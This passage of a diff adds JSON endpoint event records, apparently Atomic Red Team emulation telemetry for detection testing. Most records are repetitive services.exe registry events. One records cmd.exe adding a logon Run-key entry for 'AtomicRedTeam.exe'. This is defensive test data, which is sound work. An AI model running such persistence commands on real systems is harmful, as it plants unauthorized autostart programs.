"process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + 
"process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": 
"{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": 
"C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + 
"event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + 
"timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850430000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + 
"process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": 
"{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850580000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\DeleteFlag", + "registry_value": "DeleteFlag", + "timestamp": 131883570850740000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start", + 
"registry_value": "Start", + "timestamp": 131883570850740000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_value": "AtomicTestService", + "timestamp": 131883570850740000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 260, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570852680000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570852610000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570852610000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": 
